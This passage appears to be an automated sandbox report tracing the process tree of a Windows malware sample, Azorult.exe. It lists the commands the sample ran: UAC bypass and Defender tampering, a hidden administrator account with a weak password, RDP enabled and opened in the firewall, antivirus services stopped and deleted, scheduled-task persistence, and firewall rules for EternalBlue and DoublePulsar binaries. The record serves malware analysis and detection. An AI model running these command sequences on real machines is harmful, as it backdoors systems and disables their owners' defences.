  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,1079265899310737970,3819052658595715922,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4168
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  - System policy modification
  PID:4744
- - C:\ProgramData\Microsoft\Intel\wini.exe
    C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:3216
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      4⤵
      PID:2988
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        5⤵
        
        PID:3004
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        6⤵
        UAC bypass
        Windows security bypass
        Runs .reg file with regedit
        
        PID:5336
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        6⤵
        Runs .reg file with regedit
        
        PID:1848
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:4552
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2056
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5536
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4884
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        6⤵
        Views/modifies file attributes
        
        PID:4000
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:3048
      - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        6⤵
        Launches sc.exe
        
        PID:1040
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        6⤵
        Launches sc.exe
        
        PID:2712
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        6⤵
        Launches sc.exe
        
        PID:3068
  - - C:\ProgramData\Windows\winit.exe
      "C:\ProgramData\Windows\winit.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:4224
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        5⤵
        
        PID:3900
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:2116
- - C:\programdata\install\cheat.exe
    C:\programdata\install\cheat.exe -pnaxui
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:6124
  - - C:\ProgramData\Microsoft\Intel\taskhost.exe
      "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5236
    - - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4580
    - - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        5⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:2896
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        7⤵
        Modifies registry class
        
        PID:6140
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:5968
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:5268
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:1544
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:4964
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        Executes dropped EXE
        
        PID:5692
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        
        PID:4176
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:5744
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        
        PID:5160
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:4432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:3648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:2464
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        
        PID:896
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:4792
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        10⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        11⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:3764
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        11⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:4788
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:1716
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        11⤵
        
        PID:892
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        11⤵
        
        PID:1556
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:5296
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:4880
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:956
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        10⤵
        Sets DLL path for service in the registry
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        
        PID:2200
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        11⤵
        Modifies Windows Firewall
        
        PID:4424
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        10⤵
        Executes dropped EXE
        
        PID:5160
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        10⤵
        
        PID:5376
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        10⤵
        
        PID:6072
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        11⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6044
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        10⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4828
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1852
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:560
    - - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        5⤵
        Executes dropped EXE
        
        PID:4540
      - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1532
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7B0.tmp\7B1.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        
        PID:3136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        8⤵
        Drops file in System32 directory
        
        PID:2804
    - - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        NTFS ADS
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:5724
      - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        7⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        8⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "CCleaner Update" /F
        7⤵
        
        PID:4704
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "CCleaner Update" /F
        8⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "CCleaner Update" /F
        7⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "CCleaner Update" /F
        8⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "CCleanerCrashReporting" /F
        7⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "CCleanerCrashReporting" /F
        8⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "CCleanerSkipUAC - Admin" /F
        7⤵
        
        PID:5780
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "CCleanerSkipUAC - Admin" /F
        8⤵
        
        PID:2496
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        6⤵
        
        PID:4244
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        7⤵
        Gathers network information
        
        PID:5940
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        6⤵
        
        PID:5104
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        7⤵
        
        PID:1308
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        5⤵
        Creates scheduled task(s)
        
        PID:3632
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:2424
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        5⤵
        Drops file in Drivers directory
        
        PID:2896
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        5⤵
        
        PID:1508
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:5712
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:3496
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:3164
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        6⤵
        Kills process with taskkill
        
        PID:5844
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:4244
- - C:\programdata\install\ink.exe
    C:\programdata\install\ink.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appidsvc
    3⤵
    PID:5068
  - - C:\Windows\SysWOW64\sc.exe
      sc start appidsvc
      4⤵
      Launches sc.exe
      PID:5332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appmgmt
    3⤵
    PID:4972
  - - C:\Windows\SysWOW64\sc.exe
      sc start appmgmt
      4⤵
      Launches sc.exe
      PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    3⤵
    PID:2200
  - - C:\Windows\SysWOW64\sc.exe
      sc config appidsvc start= auto
      4⤵
      Launches sc.exe
      PID:4376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    3⤵
    PID:1276
  - - C:\Windows\SysWOW64\sc.exe
      sc config appmgmt start= auto
      4⤵
      Launches sc.exe
      PID:5732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete swprv
    3⤵
    PID:2016
  - - C:\Windows\SysWOW64\sc.exe
      sc delete swprv
      4⤵
      Launches sc.exe
      PID:1824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop mbamservice
    3⤵
    PID:5596
  - - C:\Windows\SysWOW64\sc.exe
      sc stop mbamservice
      4⤵
      Launches sc.exe
      PID:1308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    3⤵
    PID:6000
  - - C:\Windows\SysWOW64\sc.exe
      sc stop bytefenceservice
      4⤵
      Launches sc.exe
      PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
    3⤵
    PID:5296
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bytefenceservice
      4⤵
      Launches sc.exe
      PID:6056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete mbamservice
    3⤵
    PID:3684
  - - C:\Windows\SysWOW64\sc.exe
      sc delete mbamservice
      4⤵
      Launches sc.exe
      PID:892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete crmsvc
    3⤵
    PID:4636
  - - C:\Windows\SysWOW64\sc.exe
      sc delete crmsvc
      4⤵
      Launches sc.exe
      PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete "windows node"
    3⤵
    PID:5688
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "windows node"
      4⤵
      Launches sc.exe
      PID:5188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    3⤵
    PID:4752
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Adobeflashplayer
      4⤵
      Launches sc.exe
      PID:2620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    3⤵
    PID:2372
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AdobeFlashPlayer
      4⤵
      Launches sc.exe
      PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    3⤵
    PID:2540
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MoonTitle
      4⤵
      Launches sc.exe
      PID:4404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    3⤵
    PID:4336
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MoonTitle"
      4⤵
      Launches sc.exe
      PID:4664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop AudioServer
    3⤵
    PID:3004
  - - C:\Windows\SysWOW64\sc.exe
      sc stop AudioServer
      4⤵
      Launches sc.exe
      PID:3552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    3⤵
    PID:4240
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AudioServer"
      4⤵
      Launches sc.exe
      PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    3⤵
    PID:5752
  - - C:\Windows\SysWOW64\sc.exe
      sc stop clr_optimization_v4.0.30318_64
      4⤵
      Launches sc.exe
      PID:4492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    3⤵
    PID:1624
  - - C:\Windows\SysWOW64\sc.exe
      sc delete clr_optimization_v4.0.30318_64"
      4⤵
      Launches sc.exe
      PID:3420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    3⤵
    PID:6124
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:4388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    3⤵
    PID:328
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    3⤵
    PID:4268
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      PID:4600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:3748
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:3900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:2552
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:6072
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:2804
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:5680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:4176
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:4704
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:1172
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:5424
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:5816
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:1312
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    PID:2912
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    PID:5836
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    PID:3548
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    PID:4956
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    PID:5184
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:5096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    PID:2364
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    PID:808
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      PID:2428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    PID:1508
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      PID:4168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    PID:4596
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      PID:1320
